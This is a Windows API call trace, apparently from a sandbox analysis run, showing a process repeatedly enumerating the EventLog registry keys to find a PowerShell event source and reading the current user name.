	[0775.007] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x7, lpName=0x343ca0, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.007] CoTaskMemFree (pv=0x343ca0) 
	[0775.007] CoTaskMemFree (pv=0x0) 
	[0775.007] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0775.007] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x8, lpName=0x343ca0, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.007] CoTaskMemFree (pv=0x343ca0) 
	[0775.007] CoTaskMemFree (pv=0x0) 
	[0775.007] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x32c) returned 0x0
	[0775.007] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0775.008] RegOpenKeyExW (in: hKey=0x324, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x330) returned 0x0
	[0775.008] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0775.008] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x334) returned 0x0
	[0775.008] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0775.008] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x338) returned 0x0
	[0775.008] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0775.008] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x33c) returned 0x0
	[0775.008] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0775.008] RegOpenKeyExW (in: hKey=0x324, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x340) returned 0x0
	[0775.008] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0775.008] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x344) returned 0x0
	[0775.009] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0775.009] RegOpenKeyExW (in: hKey=0x324, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x348) returned 0x0
	[0775.009] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0775.009] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x34c) returned 0x0
	[0775.009] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x350) returned 0x0
	[0775.009] RegCloseKey (hKey=0x350) returned 0x0
	[0775.009] RegCloseKey (hKey=0x324) returned 0x0
	[0775.010] RegCloseKey (hKey=0x34c) returned 0x0
	[0776.882] CoTaskMemAlloc (cb=0x804) returned 0x1b6f4030
	[0776.882] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6f4030, nSize=0xed4a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed4a8) returned 0x1
	[0776.886] CoTaskMemFree (pv=0x1b6f4030) 
	[0776.887] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0776.887] GetUserNameW (in: lpBuffer=0x343ca0, pcbBuffer=0xed4e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed4e8) returned 1
	[0776.888] CoTaskMemFree (pv=0x343ca0) 
	[0778.215] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed1e8 | out: phkResult=0xed1e8*=0x354) returned 0x0
	[0778.215] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed15c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed158, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed15c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed158*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.215] CoTaskMemFree (pv=0x0) 
	[0778.215] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.215] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.215] CoTaskMemFree (pv=0x343ca0) 
	[0778.215] CoTaskMemFree (pv=0x0) 
	[0778.215] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.215] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.215] CoTaskMemFree (pv=0x343ca0) 
	[0778.215] CoTaskMemFree (pv=0x0) 
	[0778.216] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.216] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.216] CoTaskMemFree (pv=0x343ca0) 
	[0778.216] CoTaskMemFree (pv=0x0) 
	[0778.216] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.216] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.216] CoTaskMemFree (pv=0x343ca0) 
	[0778.216] CoTaskMemFree (pv=0x0) 
	[0778.216] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.216] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.216] CoTaskMemFree (pv=0x343ca0) 
	[0778.216] CoTaskMemFree (pv=0x0) 
	[0778.216] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.216] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.216] CoTaskMemFree (pv=0x343ca0) 
	[0778.217] CoTaskMemFree (pv=0x0) 
	[0778.217] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.217] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.217] CoTaskMemFree (pv=0x343ca0) 
	[0778.217] CoTaskMemFree (pv=0x0) 
	[0778.217] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.217] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.217] CoTaskMemFree (pv=0x343ca0) 
	[0778.217] CoTaskMemFree (pv=0x0) 
	[0778.217] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.217] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.217] CoTaskMemFree (pv=0x343ca0) 
	[0778.217] CoTaskMemFree (pv=0x0) 
	[0778.217] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x358) returned 0x0
	[0778.218] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0778.218] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x35c) returned 0x0
	[0778.218] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0778.218] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x360) returned 0x0
	[0778.218] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0778.218] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x364) returned 0x0
	[0778.218] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0778.218] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x368) returned 0x0
	[0778.218] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0778.219] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x36c) returned 0x0
	[0778.219] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0778.219] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x370) returned 0x0
	[0778.219] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0778.219] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x374) returned 0x0
	[0778.219] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0778.219] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x378) returned 0x0
	[0778.219] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x37c) returned 0x0
	[0778.220] RegCloseKey (hKey=0x37c) returned 0x0
	[0778.220] RegCloseKey (hKey=0x354) returned 0x0
	[0778.220] RegCloseKey (hKey=0x378) returned 0x0
	[0778.221] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed1e8 | out: phkResult=0xed1e8*=0x378) returned 0x0
	[0778.221] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed15c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed158, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed15c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed158*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.221] CoTaskMemFree (pv=0x0) 
	[0778.221] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.221] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.221] CoTaskMemFree (pv=0x343ca0) 
	[0778.221] CoTaskMemFree (pv=0x0) 
	[0778.221] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.221] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.222] CoTaskMemFree (pv=0x343ca0) 
	[0778.222] CoTaskMemFree (pv=0x0) 
	[0778.222] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.222] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.222] CoTaskMemFree (pv=0x343ca0) 
	[0778.222] CoTaskMemFree (pv=0x0) 
	[0778.222] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.222] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.222] CoTaskMemFree (pv=0x343ca0) 
	[0778.222] CoTaskMemFree (pv=0x0) 
	[0778.222] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.222] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.222] CoTaskMemFree (pv=0x343ca0) 
	[0778.222] CoTaskMemFree (pv=0x0) 
	[0778.222] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.223] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.223] CoTaskMemFree (pv=0x343ca0) 
	[0778.223] CoTaskMemFree (pv=0x0) 
	[0778.223] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.223] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.223] CoTaskMemFree (pv=0x343ca0) 
	[0778.223] CoTaskMemFree (pv=0x0) 
	[0778.223] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.223] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.223] CoTaskMemFree (pv=0x343ca0) 
	[0778.223] CoTaskMemFree (pv=0x0) 
	[0778.223] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0778.223] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x343ca0, lpcchName=0xed1e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed1e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.223] CoTaskMemFree (pv=0x343ca0) 
	[0778.223] CoTaskMemFree (pv=0x0) 
	[0778.224] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x354) returned 0x0
	[0778.224] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0778.224] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x37c) returned 0x0
	[0778.224] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0778.224] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x380) returned 0x0
	[0778.224] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0778.224] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x384) returned 0x0
	[0778.224] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0779.129] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x388) returned 0x0
	[0779.129] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0779.129] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x38c) returned 0x0
	[0779.129] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0779.130] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x390) returned 0x0
	[0779.130] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0779.130] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x394) returned 0x0
	[0779.130] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x0) returned 0x2
	[0779.130] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x398) returned 0x0
	[0779.130] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x39c) returned 0x0
	[0779.130] RegCloseKey (hKey=0x39c) returned 0x0
	[0779.131] RegCloseKey (hKey=0x378) returned 0x0
	[0779.131] RegCloseKey (hKey=0x398) returned 0x0
	[0779.132] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed1b8 | out: phkResult=0xed1b8*=0x398) returned 0x0
	[0779.132] RegQueryInfoKeyW (in: hKey=0x398, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed12c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed128, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed12c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed128*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.132] CoTaskMemFree (pv=0x0) 
	[0779.132] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0779.132] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x0, lpName=0x343ca0, lpcchName=0xed1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.132] CoTaskMemFree (pv=0x343ca0) 
	[0779.132] CoTaskMemFree (pv=0x0) 
	[0779.132] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0779.133] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x1, lpName=0x343ca0, lpcchName=0xed1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.133] CoTaskMemFree (pv=0x343ca0) 
	[0779.133] CoTaskMemFree (pv=0x0) 
	[0779.133] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0779.133] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x2, lpName=0x343ca0, lpcchName=0xed1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.133] CoTaskMemFree (pv=0x343ca0) 
	[0779.133] CoTaskMemFree (pv=0x0) 
	[0779.133] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0779.133] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x3, lpName=0x343ca0, lpcchName=0xed1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.134] CoTaskMemFree (pv=0x343ca0) 
	[0779.134] CoTaskMemFree (pv=0x0) 
	[0779.134] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0779.134] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x4, lpName=0x343ca0, lpcchName=0xed1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.135] CoTaskMemFree (pv=0x343ca0) 
	[0779.135] CoTaskMemFree (pv=0x0) 
	[0779.136] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0779.136] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x5, lpName=0x343ca0, lpcchName=0xed1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.137] CoTaskMemFree (pv=0x343ca0) 
	[0779.137] CoTaskMemFree (pv=0x0) 
	[0779.137] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0779.138] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x6, lpName=0x343ca0, lpcchName=0xed1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.138] CoTaskMemFree (pv=0x343ca0) 
	[0779.138] CoTaskMemFree (pv=0x0) 
	[0779.138] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0779.138] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x7, lpName=0x343ca0, lpcchName=0xed1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.138] CoTaskMemFree (pv=0x343ca0) 
	[0779.138] CoTaskMemFree (pv=0x0) 
	[0779.138] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0779.138] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x8, lpName=0x343ca0, lpcchName=0xed1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.141] CoTaskMemFree (pv=0x343ca0) 
	[0779.141] CoTaskMemFree (pv=0x0) 
